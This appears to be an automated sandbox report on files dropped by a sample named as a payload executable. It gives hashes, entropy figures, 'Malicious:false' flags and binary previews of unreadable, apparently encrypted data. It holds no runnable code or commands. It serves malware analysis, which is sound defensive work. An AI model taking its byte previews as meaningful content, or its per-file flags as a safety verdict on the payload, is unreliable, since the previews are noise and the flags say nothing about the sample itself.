                                                                                                Preview:SQLitW...i..b9.cB..@..**vW......?.6..............._..^..L../.d.H%.*....LG7....9.....s{BT.0t}..5.0cJ!.:rB.H\Z.V.v.. ..H.sWp..r.-.(.3z..N....1q}u.t...}.F.?.[...l........W...`..l.......k.g3.....9`..,D...QG..#.j...).z..5.g..(..4..4.Kb........Sv-.Yz..t3`.@*?.JqM7<...]5.5a.^....i>.....(~.?..;......u""...q...8..=..A.F.B..~.g:X.w^]..Y.5.9/...P..[.k`9'5.....0......E...7/.It.. V+..H.y.-.$J..,...w.Z.Lq..q.9X.y.)`..>.A.9.?`...^......k;@...e.)NQ..VE.o...{.'.P?S....S.......!WES..P.|6ng.>..FC..Z.(4.6B.n../m.q..y....A..U..5]..O.p[.U(.......>2..e0...qDrk....=....Ug.P..zj[..J.....M<.i.........3u..rCj.Ep..%.....wt....C....;....S.).r6.5D..%.Q8k2j....?..m...*....z.+.......P..1..,..:.m"M =.UM...L.[......-p..)....v.g4.).........'....:!.........H.$2Bd.?.....Q.......|kS....u...E...<P.9,...B...q.........@7...+.......yL...K8.V.T...gw......b.....UB......b.hS...%...i5.....A.t..`.6.....\.I.....Bc..V..."...... T_5...'..**|.].P}.B.......v.....:..Q..u.N..X.....U)V.*
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):354
                                                                                                Entropy (8bit):7.303125033705204
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:Q3ILtQpVJM0050H+yRvDHGcGMugLdOZ91iXQxJg2JOWc3cii96Z:QYLt+M02rsvbGc9uqAQcmgJc3cii9a
                                                                                                MD5:C7169375E6131F795462DE4234240C45
                                                                                                SHA1:3E3427B2ABBCCFD869A1941454A95F323B3C0F75
                                                                                                SHA-256:139609B06A5BC5F0977E76F6727BBC1FD8F0DACA9886E8621DB23AA28703B1AE
                                                                                                SHA-512:B1158AE495AB8F198C4AE4638862C5A581B8154E1542CE767855C7E4B8102119E32EFE1BB4B84084F09E9853A88773383027DF8A85DB4478A76E9D630C806EBE
                                                                                                Malicious:false
                                                                                                Preview:1,"fu...q{.....Mq......$.oU+.#..!...[.......r_..377.H....O.\..[E.i..m..lZ..6~Z...J.s.v.....3<Ra..j........."@.e.....5..O....../J:.u..C.....!.......^.2.h.L......UtL..~f.]..2..E?(F!..5M....;....=.YKx....D}..|....y.........2.b.b....V...5..5.D.NS...&&.r..$..PhN4=k..MBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1210
                                                                                                Entropy (8bit):7.835256339476026
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:UN47P9/duAHgnZ3i04Q8OJgEzo4jsTSpp722x3bD:UNCP9/dusgnZy0CCzoqsm+6LD
                                                                                                MD5:07C0BD441DC1431E6E0760458257736B
                                                                                                SHA1:7C205BC98249CBFDC039E1BCA52F756A05D5279C
                                                                                                SHA-256:31795E620976E15E739202067D60074BD0315E1074DAAF8353E952AB60508305
                                                                                                SHA-512:32134B8C1A714189091384E3866B82D30E22C1BEDEDF44E27708AD81F3F6DFC6DA1FCD11BFFDE2D4892BB823E0E2CDBFC1940D261A781644A631C0F724C2E268
                                                                                                Malicious:false
                                                                                                Preview:1,"fu.[..%...".E..`<.V...........o>.,..)Yv.*..yZ...W..;:..l,...w.`..\...c....c~.M{3.U.v..;....K}.~.d.s^...S7..HV6.S./.- ....;.;.{D.@Tx.F.J1gy....L..cU._..?.U4....3....d.+....JI/.....=..b...G.T.S.p.1.9.1..yU..../....9p4..:4..S..\d.&$?..m..nL.G..W...A3W..V..L....^..T..%....mg?...I/....<..2'd...A.D0..#...;..A..,.]........*......9...Fr1......m.B.!.PYFOM..9.....q.[..\.*.c...H1.-Pb.........bmA.~..h.`cw..:...........L.....;B.......c....P...O...1B.E.|*.uJ..;..P.a,...c...1.&.3.J.&$......F_$........sB......T.e.Z\.y^z}...~.O.b.Sk....z....O..*]..Z@A..Z.I.I^./.....)..L.+rT...p.M2.g....S.|.r..=$.G.5.i.5.....m...b.>d.|s.Y..,...K.c./..\N..d+'.pD...xU....Wn..w.......:^hc.i[>..."..j..........N.~d.. 5u.~.l}c.....[..|xW5.......o.6.H.....h./..n.+Yw..b.HS>|z.>(.........Y2A....+P.7.... gT..%[.~.x.bW..p..f...j.B..~-.u...7.uh...\.tw.....X.z..`.i....o..(...`....Z<.7.}..F.o.7eM....>..0Y.u..C...{......F.e#......O..!{|..f..pmf..(.d.x.2.z..*...W.eW3.j..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):16718
                                                                                                Entropy (8bit):7.98876548539806
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:zx5ShCSavfNfPzFMQlEslgEHtbwrCNE87UQduSCrvb+/dLI:loUSanV1islgEtZNZYcuSCu8
                                                                                                MD5:A1306AA72B40EF8991B452C221E546C4
                                                                                                SHA1:F0023F0E0C39DE0E0E4632C0ABBAD984D7A50661
                                                                                                SHA-256:9FB158FA162CA3B035052BD03A3CD361CA1597A41ADAD35D0514AA1E1B7A01FB
                                                                                                SHA-512:07E8CE342CB2AFF54149B313F686EA0569ECC5CF3BD9BAF951CAFC4879326F14E0BA8D5EE6C23F206DA9B69D7E79BFFCE4C39C487707CAF84419C3F7B0734EC4
                                                                                                Malicious:false
                                                                                                Preview:...@...W.h......Fe&8).......~<F..wcuS...7n..z%.T....`.e.#...-q.!........O.'.a...Z..H.%....}%.'..8.........W....Y.0.D:0.Um.teo.."Y..9.P.L+....+...&...x....#6.0.:.........$..H5.jm3st!..A.GfB.T.c...z..d *..+..t.u.vUg.B*@E.F|.r\.-.fc/3.+..h.v...V.6)G..a.......I...gr...W~zNt!.....M[&..=...:...n{1Q....d{...y...u.&.\9...3.f.H..m.......tf.6..3..&.Wt-..T^.E..m:....;p......Vp........7...0W.W^.+.l8.DA.;9...>m...L..FU.x:v....r.n@'t6.:...T.:-K...c~2 .,"..8|a...o..".}/.n."g...*.......%.<91B........%..>.\.j."...L.........%i....c...d....q...0..#...'...<y=........Q'.Q.V..(r|9..z...![*..%7Q .q..S...~.....:..ur....^)..Z].L..V'k..Y..@.m.9....:a....@OF!.....s.t..Q.f"[M...$......-.$...|.2.1..=.F|.P../...d..d.u.Rs..a.^Ij....,....9.1...p....c...J..!n....>:d...Y....0.j...EY.L.DGq...1.p..(>=T..M..Y.D.e..lzw.!.J..YD..Yc...e....V..H......./.C..f..-...C..@....d.....%.=".sDq|\[=.6.|'..Y=..q5./...4....x~<..@,5.&..NH... .....Ia4.v.>.d.s..Y...*vW..ked..pS`.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):162608
                                                                                                Entropy (8bit):7.978670808415517
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:XtxhStPBHlZD6N1snnJeZPdKMmIDHWovS2w4bjoA8IJ:dTSRZD6N1iJeOMDD2ovlfEIJ
                                                                                                MD5:7A553F57CAF84105D6EDE0F2ECBE3C7F
                                                                                                SHA1:54BF0A9D56CC6834C1738A27A808D7AACBF51B7C
                                                                                                SHA-256:74EB6D1AAB78F4E642147CDEF2A15B818C8C3B58CC003FD46CD7F3692692F974
                                                                                                SHA-512:0C8F11F8145E7984B87AC8856500D7BC1DB37E01682C7D0347034F207D9D8EF29A705280FBB951EC3E9FABD6D983DA823EB9D5F4023462125BD3684A0065A049
                                                                                                Malicious:false
                                                                                                Preview:{"Maj......&.........b..J....!...].q. ..?....h.......F.-2..N........PK...Qh/K.*....FZ...n.<v,....{...n..M...A..'/b}....A.,..c.0h}.rZ..Jg...Y#b.b7.e8..+...Z.Hjg%.wI6..E.......c#.D...{....W.y.....a7...q.`|..BR.$. .'.{....Y]{....h..$.B..R.dK..y."L.....z.I....{...f......R...;z.....+..Fw..*....Z...U..b...|...97a.i........jK......D.!P`@v...)....sSL7I.>..+._.*....pg\.w..x)zw...{j!..jU.vd...UM.!e..d.....<..&..S.;....VD.t...O.]...X..Q-=g..].\{.<...:(N5!.F-o...&.....:..X.!E.ZW?...0B..l..6z.y.:..H..d...b...D.m..~..S..A.. W.^..Ype&QR..[.I.3a...L...0...sTi..n.$..\].......Fo.7'.R..Q)..EL..,...!8............"..Uw..Of...`#.\..Hz..}.-.r...6.*.s2.._gqmJ..q......7.G]..ZI.g=..WK.I..}t.Y.CC..?.<.CU.7.bS...5&7..G....O...j.-K..6.f.D......<.....M0..?8....?.WA.7Nw.F+..C.6.]|.?..p.:..d.\]Vz.argx.p.jSp..I.h^8sp....B.^.m.0v.C.]2W...T.}...#.Q.......|...-^}...5..!..#.7h..K.[.v....g}.....C...M.'V=.*.B.../.....:....a7..'K.*.`Qg...P0.x...#. .|f.$.."..[...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2203
                                                                                                Entropy (8bit):7.89654018277714
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ydrTjT4czg5fbFt3cR6SRCitl+cQUsJabi4a95eLD:WTj0czglbFt3std7DbiTm
                                                                                                MD5:6E0F18CB050E3D45EB156E939BC0F881
                                                                                                SHA1:663F7EACBD0BB852CA4648A1212FB15E810FBA02
                                                                                                SHA-256:37A61220A89121E85BB3268C1D4A22EB0717E7D76F50078B3E04ADD4CA0A938C
                                                                                                SHA-512:12263B399EA240B79684BBF1A39E1C201CE7DC9982E2059B8D228D31585E2B03F9CD5CB64C2AFDDB09485E31A0F73C802B1FCDEDAC5E1E6E73FCB32AB1125F24
                                                                                                Malicious:false
                                                                                                Preview:<?xml..D.M..P..V...B5n..P.f......0,2.G..R.j..'.t...........XR.- ......$O...)0.{.T......S".c....E..(.M..6dl..~1..~...R.l.7V.a*o..."e..%....&.P..i._Cu....M...re.e...]).I....~.P6dUyN..P..{....<:...X...s~..d..O.._.zq~g...'.4EM.M.z.......~.V.^.y...D.ki.5 P&..."....l..}w.`.].2-..".......1a.v$.,.(.5..z4......rTs..'..XdR......FH.DX.h......5.-.....Bk.....a.:D..].o j..mKz.FT......I..q.&f...H...-......8.,...b.c..../......\.'.})W.$@.)-Z.....C.( d=.LE....z.o..R@`.t...I7V..YH.}e?6>"3...J.y{..QO#m...t@..),].:q.j2K....>.D.=,.%^.:Q"%..|Zr.m....o........ap....@c^..v.IT~.......^..l..u.fPql..B..P....n.....qx..30....$z.3S.~..X..A.=....X{.lZ......(..`Y9Le.."..1.(..b?.NHQ.......-y..&..W.a..~...f[..IM[..8.lal(..M./1..J)?t..9.)T...7.y/*...S.;....@.:..~Ate.(.5I..O,.",.Z.T..5#.}.L..Z....(.....c..@I.Z...[.....D.E.......c.sp...._...+f...dz.P.s.{Z.....^..4.......\s.\.....v.....F...O...g.K..?V.%.\.7?..w+......#dh.t.W.-.C..*..b1UZ......-...v .4..:Fh..'...n...... iR.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):8526
                                                                                                Entropy (8bit):7.9768086698871565
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:XlcI+YWTjNOvJpwAO2O+Zc2OBrrsRcJ+arwyZ1LqIrvl1BXw1WYy:XV+/jgfA1BEuJ+yLd15w1WYy
                                                                                                MD5:106B1B2B8181EEF19243B8D971F5D3AF
                                                                                                SHA1:28EAE65C6B858D62F6002F745FB73A7E574DBF49
                                                                                                SHA-256:B8BDFF0B364B25E1F6C403DAF61522F03CBB906DE4E6AB81959FE8C58C648FCD
                                                                                                SHA-512:E2E66F7F7BBA1EADD05268A1AAA900392EC8B0EA0666904FD277776E6FCF33D0010481A79B0E45FC513792B65DFC94B0A00DDED38808E250040C379241ADE9B7
                                                                                                Malicious:false
                                                                                                Preview:A......d.8'baxi`W;...@...$..U..2.97...m....K..Y.<......#.N.p.....@Z{N6...~..X.n.6.=..g".?L.#......._....B....D|...1. QJmr.....8........VF^.....6.N.F..}......%s4E4.NMH.vk..K......0.33....2.......r.n.h,.K.......3..,..........[.)Q5.M@.a[.9.....[..%2.1W.....!......&....Zd......D[."...o.TP{.[t-..H....6x....v.......Y.....:4,...]f...........%C..\1..E..f..EF.z..#h..7.o .._5]r.T.......;.&.&..of..&.=...-.j....-!..[..j.....>.a.C....A.l..S.....%........sM.......>H.O.A....Y..X="d.i..K..*s3..r.k..S.WX*.....F.........F.X+..cp7..][B..l.i:V....g=...(...K.,.w..S.f..{.x.#.BAv.:.. XHB...z..^.a84=.8.q.Gy~4o.w...gA....k......]S...f.r.oIO.'..4...U...G0.v.u.O;7=...G]..H_.....X.......~CS^......_..b.z.j@.,.....g.....j.-|..A.>W..j....M.5. o...L.....I...{.^T.....S@.di..5.3*.H..U....'m].E|!*.|.`+...`...h..v............%o..[O.p.\.(.....aA*]7...(/.jy.Vz.\..=...Q\j...)..Q.Hx.]..w.0...._.*.z8.#.}.v..G{..........T!..%..S..k}c=.%.6..s......(.3....V.T...q.z.l.iT.i.u...Rb
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):524622
                                                                                                Entropy (8bit):4.010631424650992
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:91GGZjGDvGegAcYW0Pe3sbXyM8eiQt87u5IBkajAMW5liiNOT7VRPDkSSnLRrR7O:91GYjwvG8m3sbYhQ+krZnisBY
                                                                                                MD5:DC7F67BE9C29B1A1A71083B2169AEC7C
                                                                                                SHA1:AD790DAD6B2499DE2A49F07C6E2130D7BB5D41D6
                                                                                                SHA-256:B65F81541EDDEA50B1BAB9E0E5875C15C62DE1983D64FA3F33B9D543AB429C42
                                                                                                SHA-512:5A24A0C88660AE1A800B3978128B8E5CC13788784BC24A59DA5E1588505FF61A0359DB2609AB2E1FDCE78736A58187DC9470252FEE1188EB0DE04D6C2BB44A38
                                                                                                Malicious:false
                                                                                                Preview:.......J....I..W..6c...y..-G.....w...z.....c'.|wb..........5..".Z+a.7m.....O#...gY.X.4Z7...].;....M.(.....u....c{,+.E"..;....S.....y...Rx...{Ir.<.....o.......m..M6'....fl&#..39z.K...G..<".BO..u.N...m.....'..R.6]i...Z...0^`........EN$.....1..CG.h.7.t.Oi.@G.#.#......J.?.vT9x].E%.....i8.v.jx..A..\g.Qd..)1.d..I.-3.9GW.k.....U..DVu..;e.c......)_.X.Z..B).e.u./^._....G.gJ.z_g..%q<.Y.P.Q?...{..I.\.C=N.~$>.J<..{...,.._...\n.bc.Q.70....W.c..~.}.b.[ZUU...+.R.....^S ..L..:.i.Ve..Z$......^....n..-...q.=_.<.0....E.n.)..2.]Jo.Tr...A..,...\.J..*R...&u.-.%..F.R...5UQ.....v...._.!..?i..e..=36..q.w..&'8^....H. ...y.f.:....'6...u..ev}.-.%.....Q`..s..1\.~!lw.......k.$...8...(...ui+Q..8...T4Sj..!..Y<..L.>'...A?.5...6:yU..0n|.sFkm..N...H...Ed..i...v.4.....}.0%.U..A.B..*\n.6..^...N%nv....8u...*...z...fz.k.L:r.+&.m...<#....u....d|Oy..zT.._..I.2*.w.DQ.).....^...OQ.b.Y.n,.....hS]m.$...Bx..1&I,...bn,.3..z.P.....fh....-..._..[^..........bRYp......?4\.1D....><../.kT|...bgi.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):524622
                                                                                                Entropy (8bit):3.2079989365430426
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:G5PTsNLEm6fMXqOxrKts1yKaw2XhbBZHnPjBM4cSQ:KTsNQ5UaUKtsgtw6BlP24c7
                                                                                                MD5:697E582354A377FEFFF26F2CCAFF8957
                                                                                                SHA1:A89571407A6ABE06AE835B21B481979BB574AF47
                                                                                                SHA-256:C42079D5EA1B14C5AFD395853B32CE4078E0C6D24D15D2D9BFD3906E639771B0
                                                                                                SHA-512:7CAF0AFE10FB0884ADD2D4F65900CB153232EF238EAF6E2C86578659C2EEB7CB26EB28914F78AFB8711EFBAB86A9D052CB16E24A8DFA4AD1819FDC2273BE35F4
                                                                                                Malicious:false
                                                                                                Preview:.....C..=..........K..>.*.M+.V.I.....(..;..y.....y.....(..9WN6.S..?....<..c*...~..EV'..?...+f.....[.S.l...pB..O..@..$I....w...Y...+...a.67E...vI....G.f.)d.......gF.07.....%..sdWJv...|U..<nj<p.....1G.w_.m...../e........igCI./...A..$I..p.........2.fI..m.:...N........V.....).".; ...[.E.t.K.6a%4d....2M..<..l]...P...(S_m..6......,}.*Uy..J..'...4..*..^._..Na.`...+N6y..5.....F5ht. <.T#T...w/X.......C..A.......?.K0.B..b.|Uy..l@v.~.}..c=\....1.J.....q.5....{c.>..A.......-...$0.W.[... ....n.P.._v...S._V.;.DF|D..q6#5.>....,:.J...!...&L......*...h..Y.".1.....&r.+L..J..=.K.5%.;I..u.}.......D.=.-......&.^w.Z>i%...t"5m.T...`.`.....|k}..'2V.d.@...L..Y..?...i../1..>..Ot..F..c........[.0]x6....0.......A.D;M..5.ZAP...<....Sm..L.{..W........7....P..l.#Z.5,-f5/.~.M..}..z..}.....S...X...]...z....m}.ZS...........w/.U.....~Lf...#..t.;...Z....H..,y.$-s.v&.n)l..[.:x.j.?..(..F..8qNV.:........~............D..H33......eV.mA@.'Wj.o...H.;.p>j).O1.F...l.>...g.0._I.`
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):524622
                                                                                                Entropy (8bit):3.207482785888464
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:DsHT/MEHaWmB3WTrFhTQbWyl/wxR61c5QW:MUDbB3Q/jyxIBp
                                                                                                MD5:237CA6A79BBE07CC1340674B75902428
                                                                                                SHA1:C4E4F5A3861C6077A5D31808050BD1E23474FEA7
                                                                                                SHA-256:1A289C6C5CC8792C11F1253522DAD02316AF11815F7C07F51D06CB44C7AAE58F
                                                                                                SHA-512:C720E00ED1488BA09E5F1B7BC41C2D1088A4B6B7765F0DB2A3EAA17FEF4EE05B99E47CF9589B4D09CB7AA54F66FB073603D28544BB20B69B429CBF0EBB0A20C9
                                                                                                Malicious:false
                                                                                                Preview:.....R......f.;...m.2..H/...gZ.....shf....[.'..+=.....L>.zg%V.M.>H....D).P.D6..^.C....$.a...j.....h...LD(X...:Yy}.|.....<...;nS....P.r$B.rN.9....NS..m":.p..7.)0%K....84...!9..|...6.Y..V.q.9...xk..=.&.[P.Au:.I....]>.K..cB......)^..S..(.e{...H.8xOn.n..=c..0W\qK.+..@..=Cl.Z..f...ir..r.F.#fI.P.fV.j....h.h..VT....&w.C.+..W].sO.W....I...t...D..9.....P/.Q.s].0.9..D.f..jt.p....w7...ghdh..F>....Q.G.O.JC..USI..Z.*s.b......K...6.E..9.........J..6...J...%.C.....s{V$......t.KP.p..i.4..x''w...i0......]....r.[...'..P....Y..dU..~......vUT.....-"..$/.R..4D>....s.!L.I..P..tqw....}...*..H.e....5.".~..9e...n ..o....P..$...H.....d>c|....h.....C...#.Ql..L......8.[a.M.s.}A.kG..p.u.x.&..p....~+3xZ....7Ix.[.r......N.?]....Y..^.w ..bB..T.......ET-...Z-.{.k.].5.(oH.n]r......%)}K.q.\@.@...y.....>?../...znQ.($......R|...H..`...>...l...".X2\.,P..N....\...n.j....,,/f..I..n7,.K.2;..v..J.....ah.....a0OA.O.7.ze..Q.=.5..Z.|.a.[..BU...G.wz..q.g....A..X.{..+.l...?gri.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):524622
                                                                                                Entropy (8bit):3.2080362089559453
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:wSbpR7tk08JIJ5PdmDzpuH4EuGg+UjtcEv3c0te9y4o2IVeHvQR:wE56+VEvpE2G41te9yOgmK
                                                                                                MD5:9D5F5D35654E3D91399CE84681425E3E
                                                                                                SHA1:40AAEC25B1B5445450411B74A6CC0DE5AE2AC137
                                                                                                SHA-256:BA2523E801B4623FA11A8526353534D776F7612136BE0EDAC914D06E237227DB
                                                                                                SHA-512:6E632A20DCABBFFCABC30ADEEC33D35AC82CD37DCF45D2BAD88B00FF5FA67924C61B73CB3672DCDC9C8CAE6C7183CBB4EAAF30F5B15886613B26BFA1AF34FBF9
                                                                                                Malicious:false
                                                                                                Preview:.......P....0u...7Q.w.k#Y.F.LM..}.i..S..9./\...kg.......c.....I...vGA...DmF....x.d..&&....QQ.....&\vj..D.p...\.Z..aR..W.S.^.(D.:?.x.9..O....M..-.....7m.1..^.g..kj.....!.G.s.1"j...RH.5..d.(;;.......`...*.U....P..t.M.m%E.9.T..X_.I)...3.?.g..|.9p.MW...$..o_K..O;.'...m....MOM=...1;@.........!.8.~k..m.r....2.,v!...T.....z.z......J.?.[_.s.h9~.m9F....9|.p>.G.N...6....B.Cf.A.X._.M.,>.M...\.D..)..a:..J..O.f.4."..!.&`..Ni...d......Y.q./...i$..6..H.F.1....K.K.7.\a........W....A$h:.V. ..L.XV.......8..7H.....,:+YJQW.5...T..._.1...........&:....T..q..9_q......~..0.~....zQ..$,..G.FB..m)Q....;t_d..uK.#Q...X..Uu....t...vV....|....=.6...u...261...N,.z....".il..[.j1...H.i...$../..Un....\DV\..AU...N.....<..+...KC.E..K..NWs@.O|..?E6....7{H...|.jj..g..?.U;.X..._.F/.....D e...[_..w9Zn.3.Wg.._R..r.&u...+(.P.....N...X.......<.#..(.sya.Q.N.....N.;Gn....?.<..Z...(^...s.0.n.vq2...&......_r).-W}&.x.%.VK..."...X.......X..',vt.9..k6...QI !r...3<.K#3.&...q.OJ......
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6906
                                                                                                Entropy (8bit):7.976278033837523
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:RPldNN0aX7mOKiWnuyflQf7vI9q6pb7QEoGAWGxoAOPq:RPfcay37uyCf04OfQEWoAEq
                                                                                                MD5:786D87692D0B8B8E3B6E73BCBFBF9655
                                                                                                SHA1:B265667A5DE3EA03742ED469F8435CB4ECF39279
                                                                                                SHA-256:93FDB7888150C2BCF29CF39E44D41EE1950F124F71F3236A652D5E8C47FA9F06
                                                                                                SHA-512:A593895FAB699B42E2155E2720263E5A1F293992F009333795CB3C875E1CB7877655A91F8A059037207D5D1111545E4F9C294D0A70F893A20E421563A1486E84
                                                                                                Malicious:false
                                                                                                Preview:10/039.1.........@5..R;R...$.GN.....|...o:\..jldsr..:C;.).U........R7..\@...m).....:.F,.bgm`3/m.sQk.=Y.o..S.F..F...vGyS.....(F.O)..-.#.G..c..h.?..^..Z...mN...q........{.:1I...Q....Z......4c.q......@.^..^R......!..{c)vK.7.>T#].........E?yZ...w^...g.w.. <...)$.?......C...)`.HO.-....v.....r.o....:...d...k"24...2G.....(..nb7...5..I..u...g.!..+A."...L...tX.....guo....!..;XW3.A.....$u..xN...omb.4...zm..;......N..?.K.m.............&...n4......,.....i.~o.......UC..X....1sWD....<@......A.|Krq.....@I...u.;....=e`...i.5.LL&&.\.^.".SdX...:Nn.....(....B.&...[*.-..R.H.5.#.u.pl..5+.....#jbx............At3..A.....3,"..7.3[.. ..v..n..}v..|..?(.......~.J...z....q..@.K.)..q...!lM(....u.....*e.(.....f..z.=..(1]....?.T.<...Q...V.....eS...k....K..T.A..'....cL....h..#R9...-..GQ..,.....l.5.. ....0.4..3\.Cb..0I....2z.....vc.i.R..J..)cp.0....(.4.)).......|..03.x..y...V.lK.+.....G`..z....>:.<grX.......1......2.#.......k..G..V.r...:....%T..J ....n....c..6.+
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):834
                                                                                                Entropy (8bit):7.729233690654056
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QLqz+BrZi/V+//j3KPMVenE41dzT+uHyYww2eI2Su4X6Cx3bD:qpB9gV+//j39b41xPZwHJamLD
                                                                                                MD5:BA462463B7551BAEB20EF75AD6DE192F
                                                                                                SHA1:8BE7EEEFE25420EADA59E6EAADBA964C10BF0725
                                                                                                SHA-256:4E12C40940F82DC7FA3FEEB619FE893D2F9389CC98966456B3FD357E17977683
                                                                                                SHA-512:33F076035710298D8E8616D5BA531627F04673AA403E22FFC256E9F770B7ADB0E2BF72867DFD09472BC7ED85D24C76BA50347B788506548FEE2E9AB40DEDE540
                                                                                                Malicious:false
                                                                                                Preview:..1.0x.........O.EG;.A....".W.V....l.-Z.9...8./5..OJ.z':_!...6..&p.H....{N.;.b......n...;W.+."..`7..CCV..CBk,.W.....5j...v.J8..=uZ...v&...\i.m..^../m:o..@V.)-...P.3.}.2.a..EV!..!.."..?..b....T....HAV.!7.Q.@.k...+`NXjL\.F.;L.k.KV.;...b-z)*%.n..u%.`..%p$.S.k..d9....q.Vj,.I@.........?..=.Sa.4m...Q.~.a.....6W<....+..B.R..Ij...j.|..&O_.#.~.S.>L+].,a3s......O..f....}(...3....k....<.Q...S..w"<..H\-.Nk....~C`..9=..........GP[..'0.4...vD.,S.._S..}..&...h.....KG_.V.V..K..1..{..vw'...k).>a%.w..2dDCf..-1.~R..t..z/.7.....+.k......{l3.......H....X.S.../..8.M..=..[...X..9..d....Mq(a.."E6...^...h.-.s.].a...xZ..?..0.ken.E....{...#*O2N.ml..?..zg2DV.5..S.SY=8E..N2....l....Z.o....\..`.A`.#'*;^.......<e$...H.;.K..|.....S<.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (869), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1740
                                                                                                Entropy (8bit):7.874671418995068
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:lQxLEpt1v2QGUxKLK5VzEA/3PXHnA6XpxDAQXtChRPFSLD:lW4ptvGw0Yt/3PA6pZ1Qdy
                                                                                                MD5:0D9BAAD508372F05D7C2F2505A760FEB
                                                                                                SHA1:C13C94AB291A471CFC2CC087C7BAABAE09228F98
                                                                                                SHA-256:2E18E4555B6B6EDC38F602FFF1AF7D69C27AF04A84FED07D113E9CDD4AF56F63
                                                                                                SHA-512:77F211FD3E1BA082911FED1E48BDB378A5A1E7A0062E5DB3C57F5722EF92BB63DE18A453A1D9069EB35A89D859BF917E6BFB2794BB9D336CB73AD7BE2DAE4866
                                                                                                Malicious:false
                                                                                                Preview:..1.0&9n.l...H..g..Su.1m.....E..C..[Pd.)4WB...{Lq......s..&.....M......A.V<...l.....m8...^....fz8.`..,...x.@..v.&m.bk..[...c..9....Gs~.,..!@.2cu.........%..#..3.u<*.3....&.5.y..V.4H.......V=. [.Y...w..&.........I...1..M...A.y..E.[.g/....G.!F.7....-v......yU.|._e.G........2.R..#s.C...N......?.e.".`l....:.{z......!.}A..M|..0.k...af...u)Q..tc.&.....{.<[.xKf..d.o...W........&..S. ..D..o.%....~.0M..MC1k...V.....\../V.B>r0.R..I.y....4.d..........C6m.x0m.fw..U.f.(tx......)u|0%..3....S..OO.t..\.[....O..qT.+..61..Km.S..Y....bOZ..&....<.b]..~XcI... ........v.......?q.......vFh.f.i.j..#Q%G....n..dv."...W=.......n.0O..P..\......=T..Y....|.9.f..LP..{v...QU.^.qI.q.Qcz.....9..`....(.bL.y.h.h!.QI...*)...$...5..e*.b>....].J...,.r...M0t..........L...M......{...}.f....N...^.<..WV.7...;.al/v....'.....i.GX.3.....'f.p.f.~...%..!...@...[.y...~O...=.....r.r..i}.q.Zt9.4....t....}.b.C......Tp.`..........A...........Y.{.u../..5'..j..u,%.VU.[P..=K|...$....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1353
                                                                                                Entropy (8bit):7.871277314030253
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Ys7xkc9wNC5+oMKwDaSlcAhjMGnJRYC2nihcdjtVRD6zWJmlME0TtMI55x3bD:Yckc9ww+wwaSlcyMGnJRlhwtVRimXE0F
                                                                                                MD5:6ACB3FDC168CA455F0ACC66214857AA3
